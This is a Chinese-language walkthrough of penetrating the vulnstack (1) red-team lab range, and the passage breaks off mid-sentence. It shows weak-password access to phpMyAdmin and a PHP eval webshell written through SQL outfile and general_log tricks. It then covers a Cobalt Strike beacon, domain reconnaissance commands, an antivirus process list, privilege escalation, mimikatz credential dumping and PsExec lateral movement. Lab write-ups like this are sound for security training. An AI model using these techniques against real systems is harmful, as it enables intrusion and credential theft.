ATT&CK 實戰 - 紅日安全 vulnstack (一) 靶機滲透

本文轉載自查看原文 2020-10-05 14:43 2092 網絡安全/ 內網滲透

關於部署：https://www.cnblogs.com/Cl0ud/p/13688649.html

PS：好菜，后來發現內網主機還是PING不通VM1，索性三台主機全部配成NAT模式，按照WEB靶機（VM1）->內網滲透域成員主機（VM2）->拿下域管（VM3）的步驟進行滲透

訪問VM1：http://192.168.221.143/

收集信息如下：

IP地址：192.168.221.143

主機信息：Windows NT STU1 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586

服務器解析引擎：Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45

網站絕對路徑：C:/phpStudy/WWW

被禁用函數：無

同時底部存在MySQL數據庫連接檢測：

輸入默認賬號密碼：root/root

證明弱密碼存在

根據經驗，一般使用phpstudy都會存在phpmyadmin界面，我們可以嘗試爆破目錄進而通過弱密碼控制數據庫

使用dirsearch進行目錄爆破

python3 dirsearch.py -u http://192.168.221.143/ -e *

如圖：

http://192.168.221.143/phpinfo.php 界面敏感信息泄露

http://192.168.221.143/phpmyadmin/ phpmyadmin登錄界面

root/root 登錄

嘗試使用select into outfile寫入一句話木馬

select load_file('C:/phpStudy/WWW/ma.php');
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/WWW/ma.php';

這里的網站路徑是之前我們信息搜集時找到的

執行成功，但是在目錄下無該文件

換一種姿勢寫入一句話木馬

參考自：https://xz.aliyun.com/t/3283

其中的利用日志寫shell

之前的信息搜集我們已知服務器mysql版本>5.0，而mysql5.0以上會創建日志文件，可以通過修改日志的全局變量getshell

步驟為：

檢測日志保存狀態->開啟日志保存->修改日志保存路徑->使用一句話木馬訪問網址->連接日志路徑GETSHELL

日志保存狀態和日志保存路徑需要使用以下命令進行查看：

general_log 指的是日志保存狀態，ON代表開啟，OFF代表關閉

general_log_file 指的是日志的保存路徑

SHOW VARIABLES LIKE 'general%'

可以看出 general_log 是關閉的，實際上該全局變量默認關閉

接着我們開啟日志存儲，即general_log

set global general_log = "ON";

接着修改日志保存路徑（此處路徑依然使用之前信息搜集獲得的地址）：

set global general_log_file='C:/phpStudy/WWW/ma.php';

然后就是通過日志寫入一句話木馬了，SQL查詢：

select '<?php eval($_POST[cmd]);?>';

該查詢流量會記錄在日志文件里，所以我們訪問日志文件 ma.php

可以看到存在我們訪問的日志信息，看到有Notice，還是去靶機上面看看日志文件是否正常寫入

可以看到一句話木馬寫入成功，上菜刀！

可以看到WEB目錄和備份文件沒有掃描出來，dirsearch的字典還是得自己有空再整理一下，beifen.rar很符合國人的命名習慣hhh

接着通過webshell 反彈 shell

關於CS的安裝：https://www.cnblogs.com/Cl0ud/p/13709669.html

關於CS的簡單使用方法：https://soapffz.com/sec/483.html

為了方便CS后台運行，進入screen

在screen窗口中運行teamserver服務

使用screen窗口中的快捷鍵 ctrl+ad，令任務后台運行，現在就可以關閉ssh遠程連接了，運行客戶端CS輸入之前的CS服務端IP和密碼進行登錄，賬號隨意，只要與已登錄的用戶不重復即可

點擊connect進行連接

小春兒~~加入群聊~~ has joined，先新建一個Listener，payload選擇beacon http，設置好對應的監聽端口

保存后生成一個后門，使用剛才創建的監聽器：

生成后在菜刀中上傳該文件，並且執行之

就可以看到CS主機已上線

右鍵選擇 interact 進入交互模式，將sleep調為0，這樣滲透靶機就能夠直接回顯結果，真實滲透中一般不要直接調為0，容易被流量監測，默認為60秒

冒着電腦被卡死的風險同時開啟三個虛擬機 :D

信息搜集的深度，直接關系到內網滲透測試的成敗

進行本機信息搜集：

查看當前權限

shell whoami

顯示主機名稱

shell hostname

查詢用戶列表

net user

通過分析分級用戶列表，可以找到內網機器的命名規則，特別是個人機器的名稱，可以用來推測整個域的用戶命名方式

《內網安全攻防》

獲取本地管理員（通常包含域用戶）信息

net localgroup administrators

使用systeminfo查看系統詳細信息

shell systeminfo

補丁信息如下：

域內主機的補丁通常是批量安裝的，通過查看本機補丁列表，就可以找到未打補丁的漏洞

操作系統和系統版本為：

查詢進程列表

shell tasklist

常見的殺毒軟件的進程為：

進程名	軟件
360sd.exe	360 殺毒
360tray.exe	360 實時保護
ZhuDongFangYu.exe	360 主動防御
KSafeTray.exe	金山衛士
SafeDogUpdateCenter.exe	安全狗
McAfee	McShield.exe
egui.exe	NOD32
AVP.exe	卡巴斯基
avguard.exe	小紅傘
bdagent.exe	BitDefender

獲得了本機的相關信息之后，就要判斷當前內網中是否存在域

之前在systeminfo中，"域"即為域名，如果"域"為"WORKGROUP"，則表示當前服務器不在域內：

也可以使用 ipconfig 命令，查看網絡信息

得知DNS服務器名稱為 god.org，DNS服務器往往與域控制器在同一台服務器上

查看域信息：

shell net view

查看當前登錄域及登錄用戶信息

shell net config workstation

"工作站域DNS名稱"為域名，如果為WORKGROUP表示當前為非域環境

"登錄域"表示當前登錄的用戶是域用戶還是本地用戶

繼續搜集域內基礎信息

查詢域

shell net view /domain

查詢 GOD域內全部主機：

shell net view /domain:GOD

同時可以在targets里面看到掃描出來的主機

提升本機權限 getsystem

getsystem

獲取憑據，使用 dump hash模塊導出散列值（至少具有administrators權限）

獲取當前計算機中本地用戶的密碼散列值

使用logonpasswords模塊，調用內置在CS中的mimikatz將內存中的lsass.exe進程保存的用戶明文密碼和散列導出

可以看到導出的憑據信息：

同時我們之前在橫向探測中已經獲取到了其他targets的信息，加上現在獲取到的憑證，我們可以嘗試利用獲取到的憑證+PsExec模塊登錄其他主機

雖然搭建環境的時候沒有搭建成內網的，但是還是創建一個SMB的監聽器：

關於 SMB Beacon

SMB Beacon 使用命名管道通過父級 Beacon 進行通訊，當兩個 Beacons 鏈接后，子 Beacon 從父 Beacon 獲取到任務並發送。因為鏈接的 Beacons 使用 Windows 命名管道進行通信，此流量封裝在 SMB 協議中，所以 SMB Beacon 相對隱蔽，繞防火牆時可能發揮奇效

SMB Beacon有兩種使用方式：